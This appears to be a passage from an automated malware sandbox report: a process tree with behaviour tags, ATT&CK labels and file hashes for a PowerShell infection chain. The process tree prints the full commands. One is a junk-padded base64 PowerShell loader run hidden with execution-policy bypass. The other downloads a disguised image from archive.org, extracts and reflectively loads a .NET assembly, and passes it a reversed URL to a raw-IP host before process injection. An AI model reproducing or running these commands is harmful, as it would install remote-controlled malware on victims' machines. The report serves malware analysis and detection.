∹ ˂ ≷ ㏌B5┐ ∹ ˂ ≷ ㏌H┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌ZQ┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌bwBh┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌ZQBk┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌cwBz┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌bQBi┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌eQ┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ec┐ ∹ ˂ ≷ ㏌ZQB0┐ ∹ ˂ ≷ ㏌FQ┐ ∹ ˂ ≷ ㏌eQBw┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌bgBs┐ ∹ ˂ ≷ ㏌Gk┐ ∹ ˂ ≷ ㏌Yg┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌Tw┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌Eg┐ ∹ ˂ ≷ ㏌bwBt┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌Ds┐ ∹ ˂ ≷ ㏌J┐ ∹ ˂ ≷ ㏌Bt┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌D0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌eQBw┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌LgBH┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌BN┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌G8┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌VgBB┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌p┐ ∹ ˂ ≷ ㏌C4┐ ∹ ˂ ≷ ㏌SQBu┐ ∹ ˂ ≷ ㏌HY┐ ∹ ˂ ≷ ㏌bwBr┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌K┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌k┐ ∹ ˂ ≷ ㏌G4┐ ∹ ˂ ≷ ㏌dQBs┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌g┐ ∹ ˂ ≷ ㏌Fs┐ ∹ ˂ ≷ ㏌bwBi┐ ∹ ˂ ≷ ㏌Go┐ ∹ ˂ ≷ ㏌ZQBj┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌WwBd┐ ∹ ˂ ≷ ㏌F0┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌o┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌B4┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌LgBl┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌ZQBl┐ ∹ ˂ ≷ ㏌Gw┐ ∹ ˂ ≷ ㏌aQBm┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YgBi┐ ∹ ˂ ≷ ㏌GI┐ ∹ ˂ ≷ ㏌YgBl┐ ∹ ˂ ≷ ㏌Hc┐ ∹ ˂ ≷ ㏌bQBh┐ ∹ ˂ ≷ ㏌GQ┐ ∹ ˂ ≷ ㏌YQBt┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌0┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌Lg┐ ∹ ˂ ≷ ㏌2┐ ∹ ˂ ≷ ㏌DE┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌u┐ ∹ ˂ ≷ ㏌DM┐ ∹ ˂ ≷ ㏌Lg┐ ∹ ˂ ≷ ㏌y┐ ∹ ˂ ≷ ㏌Dk┐ ∹ ˂ ≷ ㏌MQ┐ ∹ ˂ ≷ ㏌v┐ ∹ ˂ ≷ ㏌C8┐ ∹ ˂ ≷ ㏌OgBw┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌d┐ ∹ ˂ ≷ ㏌Bo┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌I┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌s┐ ∹ ˂ ≷ ㏌C┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌JwBk┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBh┐ ∹ ˂ ≷ ㏌HQ┐ ∹ ˂ ≷ ㏌aQB2┐ ∹ ˂ ≷ ㏌GE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bv┐ ∹ ˂ ≷ ㏌Cc┐ ∹ ˂ ≷ ㏌L┐ ∹ ˂ ≷ ㏌┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌EE┐ ∹ ˂ ≷ ㏌Z┐ ∹ ˂ ≷ ㏌Bk┐ ∹ ˂ ≷ ㏌Ek┐ ∹ ˂ ≷ ㏌bgBQ┐ ∹ ˂ ≷ ㏌HI┐ ∹ ˂ ≷ ㏌bwBj┐ ∹ ˂ ≷ ㏌GU┐ ∹ ˂ ≷ ㏌cwBz┐ ∹ ˂ ≷ ㏌DM┐ ∹ ˂ ≷ ㏌Mg┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Cw┐ ∹ ˂ ≷ ㏌Jw┐ ∹ ˂ ≷ ㏌n┐ ∹ ˂ ≷ ㏌Ck┐ ∹ ˂ ≷ ㏌KQ┐ ∹ ˂ ≷ ㏌=';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('┐ ∹ ˂ ≷ ㏌','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.eeeelifbbbbbewmadam/241.612.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4124,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=4120 /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD54a6fedfb3d7b6adde9d2173cf30c4a87
SHA1f8a963df8bbdc7a4dd793a317592242ff9749146
SHA2566f41c33bd537762f4b0b04b4a94af9941e7ea2c0c50da671a5c9e974055bb707
SHA512341100ddce3564ceba30390d8bada15232770c31901c4d5363b2334e5c31f715baf102c8c906017c359c717a6dee7f436ce18c8124bc499a3c58d6b2cd3d49ba
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.1MB
-
Filesize
408KB
-
Filesize
264KB
-
Filesize
5.6MB
-
Filesize
320KB
-
Filesize
584KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
8KB